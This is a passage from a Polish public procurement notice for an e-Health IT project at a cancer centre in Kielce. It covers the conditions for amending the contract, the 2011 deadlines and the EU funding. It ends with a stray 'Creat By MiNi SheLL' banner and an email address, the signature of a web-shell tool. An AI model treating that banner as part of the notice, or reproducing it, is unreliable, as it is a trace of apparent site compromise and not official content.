3) Zmiany przedmiotu umowy w szczególności ze względów organizacyjnych technologicznych, osobowych  - w zakresie sposobu realizacji przedmiotu umowy.
4) Opóźnień w realizacji projektu - w zakresie zmian w harmonogramie, o ile zmiana taka jest korzystna dla Zamawiającego lub jest konieczna w celu prawidłowej realizacji projektu.
5) Zamiany w wykazie osób przewidzianych do realizacji przedmiotu zamówienia po stronie Wykonawcy - w zakresie dostosowania umowy do tych zmian, z zastrzeżeniem iż zastąpienie osoby możliwe jest przez wyznaczenie osoby o tych samych lub wyższych kwalifikacjach.
6) Zmiany nazwy oraz formy prawnej Stron - w zakresie dostosowania umowy do tych zmian.
7) Wystąpienia siły wyższej (siła wyższa - zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od Stron, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Strony nie mogły przewidzieć i którym nie mogły zapobiec ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych) - w zakresie dostosowania umowy do tych zmian.
8) Wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony - w zakresie dostosowania umowy do tych zmian.
9) Zmiany terminu wykonania zamówienia (skrócenie/wydłużenie), wstrzymaniem/przerwaniem wykonania projektu z przyczyn zależnych od Zamawiającego lub będących następstwem zaistniałej siły wyższej oraz zmiany harmonogramu spływu środków od Instytucji Zarządzającej Świętokrzyskiego Regionalnego Programu Operacyjnego, - w zakresie dostosowania umowy do tych zmian.
10) Zmiany, o których mowa powyżej nie mogą spowodować zwiększenia wartości wynagrodzenia brutto.
11) Zmiana osoby odpowiedzialnej za wykonanie zobowiązań umownych nie stanowi zmiany Umowy, a do swej ważności wymaga złożenia Wykonawcy pisemnego oświadczenia.
3. Z wnioskiem o zmianę postanowień umowy może wystąpić zarówno Wykonawca, jak i Zamawiający.
4. Wprowadzenie zmian postanowień zawartej umowy wymaga:
1) zgodnego oświadczenia stron,
2) zachowania formy pisemnej w postaci aneksu pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip2.onkol.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świętokrzyskie Centrum Onkologii pok. 202 ul. Artwińskiego 3c, Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.05.2011 godzina 10:00, miejsce: Świętokrzyskie Centrum Onkologii - Budynek Administracyjny - sekretariat /pok. 212/ ul. Artwińskiego 3c, 25-734 Kielce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejsze zamówienie jest realizowane w ramach Regionalnego Programu Operacyjnego Województwa Świętokrzyskiego na lata 2007-2013, Oś Priorytetowa nr 2. Wsparcie innowacyjności, budowa społeczeństwa informacyjnego oraz wzrost potencjału inwestycyjnego regionu. Działanie 2.2. Budowa infrastruktury społeczeństwa informacyjnego pn. e-Zdrowie w Województwie Świętokrzyskim, rozbudowa i wdrażanie systemów informatycznych w jednostkach służby zdrowia - etap I..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com